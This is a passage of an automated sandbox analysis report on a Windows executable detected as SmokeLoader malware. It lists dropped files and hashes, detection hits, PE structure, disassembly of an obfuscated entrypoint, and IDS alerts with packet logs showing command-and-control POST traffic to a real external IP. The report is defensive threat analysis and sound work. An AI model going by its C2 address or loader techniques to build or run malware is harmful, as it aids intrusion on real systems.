                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\AC0A.tmp

                      Download File
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\ravehwg

                      Download File
                      Process:C:\Windows\explorer.exe
                      File Type:data
                      Category:modified
                      Size (bytes):339146
                      Entropy (8bit):7.999548154501351
                      Encrypted:true
                      SSDEEP:6144:hYXXHFMwwf2Bv6VKAQFAZECTOVoRmUSyz9uUBElwGuDWvXphN:hYHH3wuByOCmCT44mUSyzKwGuDWvZhN
                      MD5:2D5E8273B1A2801838262A4248FFEEA5
                      SHA1:5A820011AC547D26FCCB0292CB5DC77E691FCB3D
                      SHA-256:3A4B1F030372E1D7F1BD21B56459EC340C3771C50657DB81727D575AF19CD482
                      SHA-512:BCC8030E1CA1EEE880B039B1ECD74A630302E78818654AFE5BA978A2AD011B0C8AEA75631345654DE7D85C7136AFAF9FA31C6A69FA711C517C0FEBC32742D31C
                      Malicious:false
                      Preview:.D.%]..*..K`..._~p...Z..5F...~....7....j..B.3v.....#'.Q...a...zfc@.7......S.=..S....911/..y...+V..=..=...l......+...&z'.X..t@./&..a[.q#.,6.Z.jC.M."...i&6..a../Sm...[.q....uH.=3g:..k..M.b|ST.I....)..E..|..(....Dnb=..`......!..7.C.k..]....~....-......*..P]_g.M.&..K.......;O.d}'....Q.1q.mvw=V.......Q.C...]..S..A+..|".%c.}....).;..v*.{v...$o....N.).<....:-&..>t...,....\...<.....*.B#~w.it....D..,d..e.........7.r....`D....E..V.....T..r....V1).nr*.......s.T..\N...@...".E.\_...sQ..D.Z.idr\..'Q.....fG...s......E~.9W...<:Mnk.pQ..P.........#.l....BL12...j..o.........h.y4\.}^.....j.<..TSO.D.9.^....o...i};.6...v......=..Ti..>yq...^0D...8.W......G......=.#.N....7.b....N..i.FHc..2up.....`...\.D(+|B{...[uD.\!..^...,>G.....".oc>s..\..m.WBk;........b*....,..]..o.....f.4dq.....c.IM.[.<J..<...MW.T..r.......I....g.....gr....@k.v...n&D....\l.... ._...H.....u\..5.F^-./G$..M..*..Q....F..u\6F.K..U.UR@w.<:_.3w...........r~.(.Sy%..J."....:swY.....9..h

                      C:\Users\user\AppData\Roaming\rrrrcve

                      Download File
                      Process:C:\Windows\explorer.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):37888
                      Entropy (8bit):6.95340212298466
                      Encrypted:false
                      SSDEEP:384:sKZ1vXmx5SW6+aWmDVRuLMROLHrN/DKMtoCDl67us6lmXBhXSSS5d8P38lH9yvLJ:NvKaWmOvZxlV5AXHSLd8Uldyvjwt
                      MD5:9C0DE297B9EA30FFBE100EE12150F122
                      SHA1:DA6096EDEE23CFD59CF90C1E6A3A9146AE9D5FF0
                      SHA-256:F7544F07B4468E38E36607B5AC5B3835EAC1487E7D16DD52CA882B3D021C19B6
                      SHA-512:EE92B7ED7A10FEBD6F3D9F826B72E1F9F57BE2183AE959528B4328411069BAA633EE6C1B1F5BEDA76C8616E4F8E56FA24A7A2076F84CC400402551E61CF95721
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\rrrrcve, Author: Joe Security
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 55%
                      Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....Lf...............H.............1............@..................................r...............................................................................................................................................................text............................... ....................................................................................................f4l.........k.....-Tah.\...G.PQ..bs.#ft.6.R....%.y._....z[.w.i._17.%...X...c(.X.....`...>.'|b^~U..1....k^6X..(.....Y`..9.A{..d...S.+.4w.4@'l.'+.`..?.#>.x!.. .ye..;]....r.0.?w...o*...7d.0..8..&t..?.. bO..V....Bp...&.-A<.C^...y..?N..0..hv...~.t..z.Dj.m...(c1...!/..m._..f...fN...9..'..Z....Ou....'..,..............B....M\......'...?....A.L.mXxt.u.Q.KG.....<$t.u..4{.....4$.....u.t...4$......................L$D.......V..^.........@@L$D0...u.t..rp^u.t..{*U_.U..VW..!P..h.

                      C:\Users\user\AppData\Roaming\rrrrcve:Zone.Identifier

                      Download File
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.95340212298466
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • VXD Driver (31/22) 0.00%
                      File name:171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                      File size:37'888 bytes
                      MD5:9c0de297b9ea30ffbe100ee12150f122
                      SHA1:da6096edee23cfd59cf90c1e6a3a9146ae9d5ff0
                      SHA256:f7544f07b4468e38e36607b5ac5b3835eac1487e7d16dd52ca882b3d021c19b6
                      SHA512:ee92b7ed7a10febd6f3d9f826b72e1f9f57be2183ae959528b4328411069baa633ee6c1b1f5beda76c8616e4f8e56fa24a7a2076f84cc400402551e61cf95721
                      SSDEEP:384:sKZ1vXmx5SW6+aWmDVRuLMROLHrN/DKMtoCDl67us6lmXBhXSSS5d8P38lH9yvLJ:NvKaWmOvZxlV5AXHSLd8Uldyvjwt
                      TLSH:E403D173B041903FCB6C9376D0CA4A1F6F646FC72AE81AED0054AFAA7C513997536119
                      File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....Lf...............H.............1............@..................................r.....................................

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0x4031a5
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:
                      Time Stamp:0x664CB797 [Tue May 21 15:02:47 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:1
                      OS Version Minor:0
                      File Version Major:1
                      File Version Minor:0
                      Subsystem Version Major:1
                      Subsystem Version Minor:0
                      Import Hash:

                      Entrypoint Preview

                      Instruction
                      call 00007F3CA871FF95h
                      jne 00007F3CA871FF96h
                      je 00007F3CA871FF94h
                      arpl word ptr [ebx-75h], dx
                      sbb al, 24h
                      add esp, 04h
                      jmp 00007F3CA871FF9Ch
                      inc esp
                      sub ebx, 000031AAh
                      jmp 00007F3CA871FF97h
                      add ch, bl
                      cmc
                      inc esp
                      add dh, byte ptr [edi+eax+75h]
                      add eax, D6AFFEA7h
                      int1
                      push 00000030h
                      jne 00007F3CA871FF98h
                      je 00007F3CA871FF96h
                      pop edx
                      sub al, 94h
                      dec esp
                      add esp, 04h
                      mov edx, dword ptr [esp-04h]
                      jmp 00007F3CA871FF98h
                      dec esp
                      sub eax, eax
                      jmp 00007F3CA871FF97h
                      sub bl, ch
                      stc
                      dec esp
                      sub bl, ch
                      add eax, 246C7744h
                      inc esp
                      add eax, dword ptr fs:[edx]
                      je 00007F3CA871FF98h
                      jne 00007F3CA871FF96h
                      pushad
                      sar byte ptr [ebx], FFFFFFC2h
                      push dword ptr [eax+000000A4h]
                      jne 00007F3CA871FF98h
                      je 00007F3CA871FF96h
                      inc ecx
                      cmc
                      xor ebp, dword ptr [edi-7CDBF375h]
                      les eax, fword ptr [ebx+ebp*8]
                      push es
                      sahf
                      outsd
                      and al, 44h
                      nop
                      mov al, byte ptr [eax+687C06F9h]
                      jmp 00007F3CA871FF9Dh
                      push edi
                      test dword ptr [5E509683h], edx
                      jmp 00007F3CA871FF97h
                      and eax, E2F8EBBDh
                      jmp 00007F3CA871FF98h
                      mov bl, 6Fh
                      and al, 44h
                      and byte ptr [edx+0248B60Fh], FFFFFFEBh
                      add eax, 246FC6C4h
                      inc esp
                      add ecx, 01h
                      jmp 00007F3CA871FFA0h
                      pop ebp
                      outsd
                      daa
                      push ecx
                      mov eax, dword ptr [esp]
                      add esp, 04h
                      jmp 00007F3CA871FF97h
                      outsd
                      int EBh
                      push ecx
                      jmp 00007F3CA871FF9Eh
                      mov ebp, 5CB9E304h
                      xor dword ptr [eax], eax
                      add bl, ch
                      add eax, F5EBF525h
                      or bl, ch
                      add dword ptr [000000F7h], edi

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x902e0x9200023bdd46c37b61bc74f979b7d62ef701False0.7501872859589042data6.9994558883301154IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      05/28/24-08:25:40.383744TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974880192.168.2.477.232.129.190
                      05/28/24-08:25:18.651241TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974780192.168.2.477.232.129.190
                      05/28/24-08:23:59.175650TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4973680192.168.2.477.232.129.190
                      05/28/24-08:25:17.382161TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4974680192.168.2.477.232.129.190

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 28, 2024 08:23:59.170381069 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:23:59.175395966 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:23:59.175478935 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:23:59.175649881 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:23:59.175669909 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:23:59.180653095 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:23:59.180910110 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.120784044 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.120834112 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.120872021 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.120912075 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.120912075 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.120946884 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.120959044 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.120981932 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.121014118 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.121021032 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.121057987 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.121088028 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.121104002 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.121438980 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.121507883 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.126071930 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.126116037 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.126149893 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.126167059 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.177285910 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.228514910 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.228564024 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.228616953 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.243927002 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.243963003 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244016886 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.244124889 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244159937 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244195938 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244205952 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.244230032 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244277000 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.244672060 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244699955 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244745016 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.244848013 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244879007 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244911909 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.244918108 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.245358944 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.245390892 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.245407104 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.245426893 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.245471954 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.245862961 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.245894909 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.245928049 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.245944023 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.246367931 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.246400118 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.246419907 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.246438980 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.246470928 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.246490002 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.246530056 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.246591091 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.247154951 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.247188091 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.247221947 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.247231007 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.252433062 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.252482891 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.351412058 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.351433039 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.351445913 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.351547003 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.363272905 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.363291025 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.363373995 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.363707066 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.363724947 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.363737106 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.363746881 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.363758087 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.363771915 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.363805056 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.364108086 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364130020 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364140987 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364188910 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364201069 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364259005 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.364552021 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364571095 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364595890 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.364680052 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364734888 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364763021 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.364837885 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364856958 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364867926 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.364876986 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.364902020 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.365219116 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365236044 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365246058 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365298033 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.365438938 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365477085 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.365521908 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365533113 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365580082 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.365731955 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365751028 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365761042 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.365780115 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.366175890 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366225004 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.366262913 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366275072 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366286039 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366291046 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366297960 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366328001 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.366463900 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366522074 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.366878033 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366902113 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366938114 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.366952896 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.366962910 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.367002964 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.367263079 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.367274046 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.367284060 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.367294073 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.367306948 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.367328882 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.367630005 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.367650032 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.367690086 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.368210077 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.368228912 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.368238926 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.368267059 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.403721094 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.403734922 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.403826952 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.403841972 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.403850079 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.403862000 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.403886080 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.403901100 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.463536024 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.463582039 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.463638067 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.463673115 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.463701010 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.463725090 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.463731050 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.463781118 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.463824987 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.486845970 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.486921072 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.486975908 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487009048 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487020016 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487045050 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487052917 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487081051 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487116098 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487126112 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487149954 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487186909 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487191916 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487220049 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487257957 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487271070 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487292051 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487337112 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487382889 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487438917 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487471104 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487481117 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487596035 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487629890 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487656116 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487761974 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487792015 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487814903 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487912893 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487958908 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.487967014 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.487998962 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488044024 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488085032 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488112926 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488147020 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488154888 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488198042 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488240957 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488456964 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488492012 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488524914 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488527060 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488746881 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488794088 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488800049 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488836050 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488868952 CEST804973677.232.129.190192.168.2.4
                      May 28, 2024 08:24:00.488878965 CEST4973680192.168.2.477.232.129.190
                      May 28, 2024 08:24:00.488923073 CEST804973677.232.129.190192.168.2.4
